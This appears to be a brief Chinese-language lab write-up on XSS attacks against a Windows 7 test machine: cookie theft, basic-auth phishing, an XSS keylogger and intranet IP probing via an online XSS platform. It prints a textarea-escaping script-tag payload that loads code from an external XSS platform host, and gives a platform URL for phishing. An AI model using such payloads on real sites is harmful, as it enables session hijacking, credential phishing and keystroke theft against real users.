0X01利用平台payload獲取COOKIE
本機IP 192.168.1.100
靶機win7 192.168.1.102
我們先創建一個cookie的項目
然后在可以執行xss的地方插入我們的惡意代碼
</tExtArEa>'"><sCRiPt sRC=https://xsshs.cn/JBYE></sCrIpT>
可以看見成功回顯
0X02基礎認證釣魚
這里因為回家了 所以ip變化了一下
本機 192.168.1.10
靶機 192.168.1.2
這是我們的平台的地址
http://xss.fbisb.com/xss.php?do=module&act=view&id=15
我們一樣先建一個項目 然后對靶機進行釣魚
然后輸入后 我們返回來看我們的項目
成功釣魚
0X03XSS鍵盤記錄儀
還是先創建一個項目
然后 在可以植入XSS的地方植入XSS代碼
成功獲取鍵盤記錄
0X04內網IP探測
創建項目
然后一樣插入到可以執行js的地方
